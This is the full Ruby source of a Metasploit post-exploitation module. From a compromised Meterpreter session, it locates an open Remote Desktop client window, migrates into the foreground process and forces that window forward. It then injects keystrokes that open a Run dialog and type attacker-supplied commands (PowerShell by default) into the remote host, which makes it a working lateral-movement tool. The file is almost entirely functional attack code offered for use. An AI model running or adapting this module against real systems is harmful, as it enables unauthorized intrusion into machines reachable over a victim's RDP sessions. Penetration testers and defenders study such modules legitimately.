##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
    include Msf::Post::Windows::ExtAPI
    
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'Remote Windows infection via open RDP session using keystroke injection',
          'Description' => %q{
            This module searches for a open remote desktop session and injects a command-line payload using keyevent and keyboard_send. It opens a run dialog and executeds RUN_CMD. Optionally it executes another command CMD after DELAY seconds.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'otr <contact[at]oripka.de>',
          ],
          'References' => [
            'URL', 'https://www.packetsafari.com/blog/2022/12/08/lateral-movement-via-keystroke-injection/',
          ],
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => [SCREEN_EFFECTS]
          },
          'Platform' => [ 'win' ],
          'SessionTypes' => [ 'meterpreter', ],
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_ui_keyevent_send,
                stdapi_ui_keyboard_send
              ]
            }
          }
        )
      )
      register_options(
        [
            OptString.new('RUN_CMD', [true, 'Command to execute in run dialog', 'powershell.exe' ]),
          OptInt.new('DELAY', [false, 'Time to wait for run command to open window', 3]),
          OptString.new('CMD', [false, 'Command to execute after run dialog command executed' ]),
          OptString.new('CMD_EXIT', [false, 'Command to execute after CMD executed', 'exit' ])		
        ]
      )
    end
    
    def get_foreground_pid()
      foreground_window = client.railgun.user32.GetForegroundWindow()
      foreground_window_handle = foreground_window['return']
      print_good("Found foreground window handle #{foreground_window_handle}")
      
      foreground_window_pid = get_pid_for_handle(foreground_window_handle)
      return foreground_window_pid
  
      # Idea, here we can lookup more information like the user context
      # [+] {"pid"=>6232, "ppid"=>440, "name"=>"rdpclip.exe", "path"=>"C:\\Windows\\System32\\rdpclip.exe", "session"=>2, "user"=>"PC1\\student"
      session.sys.process.get_processes().each do |x|
        if x['pid'] == foreground_window_pid
          print_good("Found foreground process: #{x}")
        end
      end
    end
    
    def migrate_to_foreground_process(targetpid)
      mypid = session.sys.process.getpid
      if mypid == targetpid
        print_good("Already in foreground no need to migrate")
        return true
      else
        print_status("Migrating from PID: #{mypid} to #{targetpid}")
        begin
          session.core.migrate(targetpid)
        rescue
          print_error("Unable to migrate, try getsystem first")
          return false
        end
        print_good("Migrated to : #{targetpid} successfully")
        return true
      end 
    end
    
    def get_pid_for_handle(handle)
       windows = client.extapi.window.enumerate(true, nil)
      found_pid = nil
      
      windows.each do |w|
        if w[:handle] == handle
         found_pid = w[:pid]
         print_good("Found PID for handle: #{w[:pid]} #{w[:class_name]} #{w[:title]}")
         break
        end
      end
      
      if found_pid == nil
          print_error("Could not find PID for handle #{handle}")
      end
      
      return found_pid
    end
    
    def find_target_remote_session()
      class_name = "TscShellContainerClass" # terminal session
      
      # finding window by classame
      target_window = client.railgun.user32.FindWindowExW(nil, nil, class_name, nil)
      
      # getting window handle
      window_handle = target_window['return']
      #target_window = client.railgun.user32.EnumWindows.find { |w| w[:title] == window_title 
      
      print_good("Target remote session found window class#{class_name}, handle #{window_handle}")
      return window_handle
    end
    
    # helper function to send keycodes; just supports the necessary ones
    def send_keyevent(code, action)
      # key definitions
      key_codes = {
          '13' => 'enter',
          '91' => 'windows',
          '38' => 'up',
          '27' => 'escape',
          '82' => 'r',
          '19' => 'break',
          '18' => 'alt',
          '36' => 'home',
          '9' => 'tab',
          '17' => 'ctrl'
          
      }
      actions = { '0' => 'press', '1' => 'down', '2' => 'up' }
      
      code_i = key_codes.key(code).to_i
      action_i = actions.key(action).to_i
      session.ui.keyevent_send(code_i, action_i)
    end
    
    def migrate_and_bring_window_to_foreground(foreground_pid, remote_session_handle)
    
      print_status("Migrating into #{foreground_pid}")
      # we need to inject into the foreground window because of these rules
      # https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setforegroundwindow
      migrated = migrate_to_foreground_process(foreground_pid)
      if migrated
          print_good("Migration to #{foreground_pid} successful")
      else 
          print_error("Failed to migrate into #{foreground_pid}")
          return 1
      end
      
      # We are running in the foreground window now. So we can bring the remote sesssion
      # to the foreground and interact with it
      print_status("Bringing window to foreground")
      foreground_window = client.railgun.user32.SetForegroundWindow(remote_session_handle)
    end
    
    def make_rdp_fullscreen_when_in_foreground()
      # make it a full screen: window key and up
      # we need this to successfully open a run prompt in the remote session
      print_status("Making window full-screen")
      send_keyevent('windows', 'down')
      send_keyevent('up', 'press')
      send_keyevent('windows', 'up') 
    end
  
    def inject_keystrokes()      
      remote_session_handle = find_target_remote_session()
      remote_session_pid = get_pid_for_handle(remote_session_handle)
      
      if remote_session_handle == 0
          print_error("Did not find any remote sesssion")
          return
      end

      # get foreground window pid 
      foreground_pid = get_foreground_pid()
  
      if foreground_pid == nil
          print_error("Foreground window not found")
          return
      end
      
      if remote_session_pid == foreground_pid
          print_good("Remote session window is already in the foreground, no need to force it")
      else
          # we need to migrate 
          migrate_and_bring_window_to_foreground(foreground_pid, remote_session_handle)	
      end
  
      # we need the rdp window to be fullscreen
      make_rdp_fullscreen_when_in_foreground()
      
      #send escape key to try to get into a consistent state
      send_keyevent('escape', 'press')
  
      print_status("Opening run prompt")
      # open a run prompt; windows+r
      send_keyevent('windows', 'down')
      send_keyevent('r', 'press')
      send_keyevent('windows', 'up')
  
      # open powershell 
      print_status("Sending RUN_CMD")
      run_cmd = datastore["RUN_CMD"] || nil
      session.ui.keyboard_send(run_cmd)
      send_keyevent('enter', 'press')
  
      cmd = datastore["CMD"] || nil
      if cmd != nil
          print_status("Sleeping 3 seconds")
          delay = datastore["DELAY"] || nil
  
          sleep(3)
          # sending command	
          print_status("Sending CMD")
          
          session.ui.keyboard_send(cmd)
          send_keyevent('enter', 'press')
      end
  
      cmd_exit = datastore["CMD_EXIT"] || nil
      if cmd_exit != nil
          print_status("Sending CMD_EXIT")
          session.ui.keyboard_send(cmd_exit)
          send_keyevent('enter', 'press')
      end
  
      # minimize fullscreen window again
      print_status("Minimizing window again")
      send_keyevent('ctrl', 'down')
      send_keyevent('alt', 'down')
      send_keyevent('home', 'press')
      send_keyevent('alt', 'up')
      send_keyevent('ctrl', 'up')
  
  
      # https://superuser.com/questions/207534/keyboard-shortcut-to-minimize-remote-desktop
      send_keyevent('alt', 'down')
      send_keyevent('tab', 'press')
      send_keyevent('alt', 'up')
      
      return 
    end
  
    def run
      return 0 if session.type != 'meterpreter'
      inject_keystrokes()  
    end
  end